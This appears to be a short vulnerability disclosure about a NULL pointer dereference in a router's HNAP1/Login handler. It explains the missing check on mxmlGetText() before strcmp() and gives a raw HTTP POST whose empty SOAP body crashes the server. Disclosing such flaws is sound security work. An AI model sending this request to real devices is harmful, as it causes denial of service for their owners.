The function sub_42AF30() manages HNAP1/Login. It utilizes mxmlGetText() to retrieve the 'Action' parameter, but it does not verify if the Text is NULL. Passing a NULL pointer to strcmp() could cause the server to crash unexpectedly.
This allows an authorized attacker to perform a DoS attack.
b'POST /HNAP1/ HTTP/1.1\\r\\nContent-Length: 246\\r\\nSOAPAction: "<http://purenetworks.com/HNAP1/Login>"\\r\\nCookie: hasLogin=0; uid=ujcI4DPmyw; PrivateKey=C8B843B87E7C03EF5F224D6D4949A7F1; timeout=37\\r\\n\\r\\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" xmlns:xsd="<http://www.w3.org/2001/XMLSchema>" xmlns:soap="<http://schemas.xmlsoap.org/soap/envelope/>"><soap:Body></soap:Body></soap:Envelope>'